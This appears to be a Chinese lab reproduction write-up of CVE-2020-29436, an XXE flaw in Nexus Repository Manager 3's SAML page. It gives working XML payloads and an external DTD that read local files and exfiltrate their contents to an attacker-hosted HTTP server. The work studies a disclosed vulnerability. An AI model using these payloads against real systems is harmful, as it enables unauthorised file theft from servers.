一、漏洞名称:
Nexus Repository Manager 3 XML外部实体注入
二、漏洞编号:
CVE-2020-29436
三、漏洞描述:
2020年12月16日,360CERT监测发现Nexus Repository Manager 3发布了Nexus Repository Manager 3 命令注入漏洞 的风险通告,该漏洞编号为 CVE-2020-29436 ,漏洞等级:高危 ,漏洞评分:8.7 。
拥有管理员权限的远程攻击者通过 构造特定的XML请求 ,可造成 XML外部实体注入 。
四、影响版本:
Sonatype:Nexus Repository Manager 3 : <=3.28.1
五、漏洞分析:
漏洞攻击点在于SAML的单点登陆配置页面,有个大大的XML输入框,初步测试发现回包中会去解析XML,并将错误信息返回。如果同样能够解析DTD的话,就很可能存在XXE注入
六、实验环境及准备:
Windows系统:用于运行Nexus服务,默认服务端口8081
kali系统:用于起一个简单的http服务,存放外部DTD用于payload构造
起http服务(在哪个目录下运行,哪个目录就是根目录):python3 -m http.server 8080
Nexus软件:
?直接官网下载,这里用的是Windows版的3.28.1-01版本
?解压后进入cmd进入bin目录,运行服务:nexus.exe /run
运行成功:
登陆系统,默认用户名admin,默认密码在软件目录中的admin.password文件中,直接搜到就行
登陆之后需要升级pro版本,因为默认的普通版SMAL功能访问受限制,到官网申请pro的试用授权
然后导入license,就可以访问到SMAL功能
八、复现步骤:
复现倒是比较简单,主要是构造payload
首先在起好的http服务器中写好本地dtd:
<!ENTITY % all "<!ENTITY % send SYSTEM '%file;'>">
%all;
页面上填入payload,并抓包
192.168.139.129是存放本地DTD的http服务器地址
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE ANY [ <!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % dtd SYSTEM "http://192.168.139.129:8080/xxe.dtd">
%dtd; %send;]>
<ANY>xxe</ANY>
回包中成功返回文件内容
九、其他尝试:
尝试一:Docker环境
-
docker 环境
-
直接下载docker 运行
-
密码在admin.password,进容器直接搜
-
其他步骤都一样,但是到攻击的时候,由于权限不够,只能读取服务自己目录下的文件
尝试读取/etc/passwd,失败
?
?读取服务器自己目录下的文件,成功读取
尝试二:外带数据
利用get方式外带数据,修改本地DTD payload:
-
修改本地DTD payload:
<!ENTITY % all "<!ENTITY % send SYSTEM '192.168.139.129:8080/%file;'>"> %all;尝试读取win.ini,失败
也没有日志生成
-
尝试读取更小的文件,C盘根目录下新建个txt
读取成功,同时服务器端也能看到日志
-
通过直接定义file实体为win.ini内容,发现外带数据只能带单行数据
尝试三:将更多payload放到本地
-
修改本地DTD payload:
<!ENTITY % file SYSTEM "file:///C:/Windows/win.ini"> <!ENTITY % all "<!ENTITY % send SYSTEM '192.168.139.129:8080/%file;'>"> %all; %send; -
请求包payload,只需要引入本地DTD就行:
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE ANY [ <!ENTITY % dtd SYSTEM "http://192.168.139.129:8080/xxe.dtd"> %dtd;]> <ANY>xxe</ANY>成功
